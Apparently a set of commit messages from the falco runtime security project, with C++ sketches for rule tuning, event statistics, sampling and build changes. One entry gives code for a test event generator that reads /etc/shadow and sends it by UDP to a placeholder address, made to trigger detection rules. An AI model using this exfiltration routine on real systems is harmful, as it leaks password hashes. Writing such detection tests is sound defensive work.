Make sure falco doesn't flag the activity of draios-agent as
suspicious, since you might run open source falco alongside
sysdig cloud.
App checks spawned by sysdig cloud binaries might also change namespaces,
so also allow children of sysdigcloud binaries to call setns.
Collect stats on the number of events processed and dropped. When run
with -v, print these stats. This duplicates sysdig behavior and can be
useful when diagnosing problems related to dropped events throwing off
internal state tracking.
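A minimal sketch of what such counters look like; the struct and field
names here are illustrative, not falco's actual types:

    // Per-run event statistics, printed only when -v (verbose) is given.
    #include <cstdio>
    #include <cstdint>

    struct event_stats
    {
        uint64_t n_evts = 0;   // events delivered to userspace and processed
        uint64_t n_drops = 0;  // events dropped at the kernel/inspector level
    };

    static void print_stats(const event_stats &s, bool verbose)
    {
        if(!verbose)
        {
            return;
        }
        printf("Events detected: %llu\n", (unsigned long long) s.n_evts);
        printf("Events dropped: %llu\n", (unsigned long long) s.n_drops);
    }

    int main()
    {
        event_stats s;
        s.n_evts = 12345;  // normally incremented once per captured event
        s.n_drops = 67;    // normally read from the inspector's drop counters
        print_stats(s, true /* as if -v was passed */);
        return 0;
    }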
Bring over functionality from sysdig to write trace files. This is easy
as all of the code to actually write the files is in the inspector. This
just handles the -w option and arguments.
This can be useful to write a trace file in parallel with live event
monitoring so you can reproduce it later.
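A rough sketch of the -w handling, assuming the libsinsp interface sysdig
used at the time (sinsp::open and sinsp::autodump_start):

    #include <sinsp.h>
    #include <string>

    int main(int argc, char **argv)
    {
        std::string dump_file;
        if(argc > 2 && std::string(argv[1]) == "-w")
        {
            dump_file = argv[2];
        }

        sinsp inspector;
        inspector.open();

        // With -w, ask the inspector to also write every captured event to
        // the trace file, in parallel with live processing.
        if(!dump_file.empty())
        {
            inspector.autodump_start(dump_file, false /* no compression */);
        }

        // ... the normal event loop via inspector.next() would follow ...
        return 0;
    }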
Add a new list k8s_binaries and allow those binaries to do things like
setns/spawn shells. It's not the case that all of these binaries
actually do these things, but keeping it as a single list makes
management easier.
The logic for detecting if a file exists was backwards. It would treat a
file as existing if it could *not* be opened. Reverse that logic so it
works.
This fixes https://github.com/draios/falco/issues/135.
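In isolation, the corrected check looks roughly like this (a sketch; the
real check lives in falco's startup code):

    #include <fstream>
    #include <string>

    // A file "exists" only if it can actually be opened for reading;
    // previously the result was inverted.
    static bool file_exists(const std::string &path)
    {
        std::ifstream f(path);
        return f.good();
    }

    int main(int argc, char **argv)
    {
        return (argc > 1 && file_exists(argv[1])) ? 0 : 1;
    }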
Copy handling of -pk/-pm/-pc/-k/-m arguments from sysdig. All of the
relevant code was already in the inspector so that was easy.
The information from k8s/mesos/containers is used as follows (a sketch of
the substitution follows this list):
- In rule outputs, if the format string contains %container.info, that
is replaced with the value from -pk/-pm/-pc, if one of those options
was provided. If no option was provided, %container.info is replaced
with a generic %container.name (id=%container.id) instead.
- If the format string does not contain %container.info, and one of
-pk/-pm/-pc was provided, that is added to the end of the formatting
string.
- If -p was specified with a general value (i.e. not
kubernetes/mesos/container), the value is simply added to the end and
any %container.info is replaced with the generic value.
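A hedged sketch of that substitution; the helper and parameter names are
hypothetical, not falco's actual code:

    #include <iostream>
    #include <string>

    static std::string apply_format_info(std::string format,
                                         const std::string &container_info, // from -pk/-pm/-pc, "" if absent
                                         const std::string &general_info)   // from a general -p, "" if absent
    {
        const std::string token = "%container.info";
        const std::string generic = "%container.name (id=%container.id)";

        std::string::size_type pos = format.find(token);
        if(pos != std::string::npos)
        {
            // %container.info present: use the -pk/-pm/-pc value if one was
            // given, otherwise fall back to the generic name/id form.
            format.replace(pos, token.size(),
                           container_info.empty() ? generic : container_info);
        }
        else if(!container_info.empty())
        {
            // No %container.info in the format string: append the value.
            format += " " + container_info;
        }

        // A general -p value is simply appended to the end.
        if(!general_info.empty())
        {
            format += " " + general_info;
        }
        return format;
    }

    int main()
    {
        std::cout << apply_format_info("proc=%proc.name %container.info", "", "") << "\n";
        std::cout << apply_format_info("proc=%proc.name", "pod=%k8s.pod.name", "") << "\n";
        return 0;
    }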
There are a lot of command line options now, so sort them alphabetically
in the usage and getopt handling to make them easier to find.
Also rename -p <pidfile> to -P <pidfile>, thinking ahead to the next
commit.
Add jq to the docker image containing falco. jq is very handy for
transforming json, which comes into play if you want to post to
slack (or other) webhooks.
Add an exfiltration action that reads /etc/shadow and sends the contents
to an arbitrary ip address and port via a udp datagram.
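A minimal sketch of such an action; the destination address and port below
are placeholders:

    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <unistd.h>
    #include <fstream>
    #include <sstream>
    #include <string>

    int main()
    {
        // Read the sensitive file.
        std::ifstream shadow("/etc/shadow");
        std::stringstream buf;
        buf << shadow.rdbuf();
        std::string contents = buf.str();

        // Send the contents in a single udp datagram.
        int fd = socket(AF_INET, SOCK_DGRAM, 0);
        if(fd < 0)
        {
            return 1;
        }

        struct sockaddr_in dest = {};
        dest.sin_family = AF_INET;
        dest.sin_port = htons(9999);                    // placeholder port
        inet_pton(AF_INET, "10.0.0.1", &dest.sin_addr); // placeholder address

        sendto(fd, contents.data(), contents.size(), 0,
               (struct sockaddr *) &dest, sizeof(dest));
        close(fd);
        return 0;
    }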
Add the ability to specify actions via the environment instead of the
command line. If actions are specified via the environment, they replace
any actions specified on the command line.
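A sketch of how that override could work; the environment variable name
used here is hypothetical:

    #include <cstdlib>
    #include <sstream>
    #include <string>
    #include <vector>

    static std::vector<std::string> resolve_actions(const std::vector<std::string> &cli_actions)
    {
        const char *env = getenv("EVENT_GENERATOR_ACTIONS"); // hypothetical variable name
        if(env == nullptr)
        {
            return cli_actions; // nothing in the environment: keep --action values
        }

        // The environment replaces (does not merge with) command-line actions.
        std::vector<std::string> actions;
        std::stringstream ss(env);
        std::string item;
        while(std::getline(ss, item, ','))
        {
            actions.push_back(item);
        }
        return actions;
    }

    int main()
    {
        std::vector<std::string> from_cli = {"action_a", "action_b"}; // placeholder action names
        std::vector<std::string> actions = resolve_actions(from_cli);
        return actions.empty() ? 1 : 0;
    }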
The new privileged falco rule was noisy when running kubernetes, which
can run privileged containers. Add kubernetes to the trusted_containers list.
Also eliminate a couple spurious warnings related to spawning shells in
containers.
New rule 'File Open by Privileged Container' triggers when a container
that is running privileged opens a file.
New rule 'Sensitive Mount by Container' triggers when a container that
has a sensitive mount opens a file. Currently, a sensitive mount is a
mount of /proc.
This depends on https://github.com/draios/sysdig/pull/655.
If a rule has an enabled attribute, and if the value is false, call the
engine's enable_rule() method to disable the rule. Like add_filter,
there's a static method which takes the object as the first argument and
a non-static method that calls the engine.
This fixes #72.
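A sketch of the static/non-static pairing, with simplified stand-in class
and engine names:

    #include <string>

    class falco_engine_stub
    {
    public:
        void enable_rule(const std::string &pattern, bool enabled)
        {
            // ... flip the enabled flag on every rule matching pattern ...
            (void) pattern;
            (void) enabled;
        }
    };

    class rule_loader
    {
    public:
        rule_loader(falco_engine_stub *engine) : m_engine(engine) {}

        // Static form: takes the object as its first argument, so it can be
        // handed around as a plain callback (like add_filter).
        static void enable_rule(rule_loader *ls, const std::string &rule, bool enabled)
        {
            ls->enable_rule(rule, enabled);
        }

        // Non-static form: forwards to the engine.
        void enable_rule(const std::string &rule, bool enabled)
        {
            m_engine->enable_rule(rule, enabled);
        }

    private:
        falco_engine_stub *m_engine;
    };

    int main()
    {
        falco_engine_stub engine;
        rule_loader loader(&engine);
        rule_loader::enable_rule(&loader, "some_rule", false);
        return 0;
    }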
- In the regression tests, make the config file configurable in the
multiplex file via 'conf_file'.
- A new multiplex file item 'outputs' containing a list of <filename>:
<regex> tuples. For each item, the test reads the file and matches
each line against the regex. A match must be found for the test to
pass.
- Add 2 new tests that test file output and program output. They write
to files below /tmp/falco_outputs/ and the contents are checked to
ensure that alerts are written.
The falco engine changes broke the output methods that take
configuration (like the filename for file output, or the program for
program output). Fix that by properly passing the options argument to
each method's output function.
Falco itself spawns a shell when using program notifications, so add
falco to the set of trusted programs. (Also add some other programs,
like make, awk, and configure, that are run while building.)
New variable FALCO_RULES_DEST_FILENAME allows the rules file to be
installed with a different filename. Not set in the falco repo, but in
the agent repo it's installed as falco_rules.default.yaml.
Improve the ruleset after exercising it with the falco event_generator:
- Instead of assuming all shells are bash, add a list shell_binaries
and macro shell_procs, and replace references to bash with
shell_procs. This revealed some other programs that can spawn shells.
- Add "login" as an interactive command. systemd-login isn't in alpine
linux, which is the linux distro used for the container.
- Move read_sensitive_file_untrusted before
read_sensitive_file_trusted_after_startup, so it can hit first.
C++ program that performs bad activities related to the current falco
ruleset. There are configurable actions for almost all of the current
ruleset, via the --action argument.
By default it runs in a loop forever; this can be overridden via --once.
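A minimal sketch of that loop; the option handling and action body are
simplified stand-ins for the real program:

    #include <cstring>
    #include <unistd.h>

    static void perform_actions()
    {
        // ... e.g. spawn a shell, write below /bin, read /etc/shadow ...
    }

    int main(int argc, char **argv)
    {
        bool once = false;
        for(int i = 1; i < argc; i++)
        {
            if(strcmp(argv[i], "--once") == 0)
            {
                once = true;
            }
        }

        do
        {
            perform_actions();
            sleep(1);
        }
        while(!once);

        return 0;
    }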
Also add a Dockerfile that compiles event_generator.cpp within an alpine
linux image and copies it to /usr/local/bin. This image has been pushed
to docker hub as "sysdig/falco-event-generator:latest".
Add a Makefile that runs the right docker build command.
Docker 1.12 split docker into docker and dockerd, so add dockerd as a
docker binary. Also be consistent about using docker_binaries instead of
just references to docker.
Also add ldconfig as a program that can write to files below /etc.
Add tests that cover reading from multiple sets of rule files and
disabling rules. Specific changes:
- Modify falco to allow multiple -r arguments to read from multiple
files (see the getopt sketch after this list).
- In the test multiplex file, add a disabled_rules attribute,
containing a sequence of rules to disable. This results in -D arguments
when running falco.
- In the test multiplex file, 'rules_file' can be a sequence. It
results in multiple -r arguments when running falco.
- In the test multiplex file, 'detect_level' can be a sequence of
multiple severity levels. All levels will be checked for in the
output.
- Move all test rules files to a rules subdirectory and all trace files
to a traces subdirectory.
- Add a small trace file for a simple cat of /dev/null. Used by the
new tests.
- Add the following new tests:
- Reading from multiple files, with the first file being
empty. Ensure that the rules from the second file are properly
loaded.
- Reading from multiple files with the last being empty. Ensures
that the empty file doesn't overwrite anything from the first
file.
- Reading from multiple files with varying severity levels for each
rule. Ensures that both files are properly read.
- Disabling rules from a rules file, both with full rule names
and regexes. Will result in not detecting anything.
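A sketch of the getopt handling for repeated -r and -D arguments
(simplified; falco's real option handling has many more flags):

    #include <unistd.h>
    #include <string>
    #include <vector>

    int main(int argc, char **argv)
    {
        std::vector<std::string> rules_files;
        std::vector<std::string> disabled_patterns;

        int op;
        while((op = getopt(argc, argv, "r:D:")) != -1)
        {
            switch(op)
            {
            case 'r':
                rules_files.push_back(optarg);       // -r may be given many times
                break;
            case 'D':
                disabled_patterns.push_back(optarg); // each -D disables matching rules
                break;
            default:
                return 1;
            }
        }

        // Each file in rules_files is loaded into the engine in order; each
        // pattern in disabled_patterns is then used to disable matching rules.
        return 0;
    }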
Add the ability to drop events at the falco engine level in a way that
can scale with the dropping that already occurs at the kernel/inspector
level.
New inline function should_drop_evt() controls whether or not events are
matched against the set of rules, and is controlled by two
values--sampling ratio and sampling multiplier.
Here's how the sampling ratio and multiplier influence whether or not an
event is dropped in should_drop_evt(). The intent is that
m_sampling_ratio generally changes external to the engine, e.g. in
the main inspector class, based on how busy the inspector is. A sampling
ratio of 1 implies no dropping. Values > 1 imply increasing levels of
dropping. External to the engine, the sampling ratio results in events
being dropped at the kernel/inspector interface. The sampling
multiplier is an amplification to the sampling factor in
m_sampling_ratio. If 0, no additional events are dropped other than
those that might be dropped by the kernel/inspector interface. If 1,
events that make it past the kernel module are subject to an additional
level of dropping at the falco engine, scaling with the sampling ratio
in m_sampling_ratio.
Unlike the dropping that occurs at the kernel level, where the events in
the first part of each second are dropped, this dropping is random.
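A hedged sketch of that decision, assuming an event survives the engine-level
check with probability 1/(multiplier * ratio):

    #include <cstdlib>
    #include <cstdint>

    class engine_sampling
    {
    public:
        bool should_drop_evt() const
        {
            if(m_sampling_multiplier == 0 || m_sampling_ratio == 1)
            {
                return false; // only kernel/inspector-level dropping applies
            }

            // Random drop, scaled by the current sampling ratio.
            double coin = (rand() % 1000) / 1000.0;
            return coin >= 1.0 / (m_sampling_multiplier * m_sampling_ratio);
        }

        uint32_t m_sampling_ratio = 1;    // updated externally as the inspector gets busy
        double m_sampling_multiplier = 0; // 0 disables engine-level dropping
    };

    int main()
    {
        engine_sampling s;
        s.m_sampling_ratio = 8;
        s.m_sampling_multiplier = 1;
        return s.should_drop_evt() ? 1 : 0;
    }

Under this sketch, with a ratio of 8 and a multiplier of 1, roughly 7 out
of every 8 events that reach the engine would be dropped.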
Move the c++ and lua code implementing falco engine/falco common to its
own directory userspace/engine. It's compiled as a static library
libfalco_engine.a, and has its own CMakeLists.txt so it can be included
by other projects.
The engine's CMakeLists.txt has an add_subdirectory for the falco rules
directory, so including the engine also builds the rules.
The variables you need to set to use the engine's CMakeLists.txt are:
- CMAKE_INSTALL_PREFIX: the root directory below which everything is
installed.
- FALCO_ETC_DIR: where to install the rules file.
- FALCO_SHARE_DIR: where to install lua code, relative to the
install/package root.
- LUAJIT_INCLUDE: where to find header files for lua.
- FALCO_SINSP_LIBRARY: the library containing sinsp code. It will be
considered a dependency of the engine.
- LPEG_LIB/LYAML_LIB/LIBYAML_LIB: locations for third-party libraries.
- FALCO_COMPONENT: if set, will be included as a part of any install()
commands.
Instead of specifying /usr/share/falco in config_falco_*.h.in, use
CMAKE_INSTALL_PREFIX and FALCO_SHARE_DIR.
The lua code for the engine has also moved, so the two lua source
directories (userspace/engine/lua and userspace/falco/lua) need to be
available separately via falco_common; to allow that, the source
directory is now an argument to falco_common::init.
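A sketch of what passing the lua source directory to init might look like;
the exact signature here is illustrative:

    #include <string>

    class falco_common_sketch
    {
    public:
        void init(const char *lua_main_filename, const char *source_dir)
        {
            m_lua_main_filename = lua_main_filename;
            m_source_dir = source_dir; // e.g. userspace/engine/lua or userspace/falco/lua
            // ... load lua_main_filename from source_dir into the lua state ...
        }

    private:
        std::string m_lua_main_filename;
        std::string m_source_dir;
    };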
As a part of making it easy to include in another project, also clean up
LPEG build/defs. Modify build-lpeg to add a PREFIX argument to allow for
object files/libraries being in an alternate location, and when building
lpeg, put object files in a build/ subdirectory.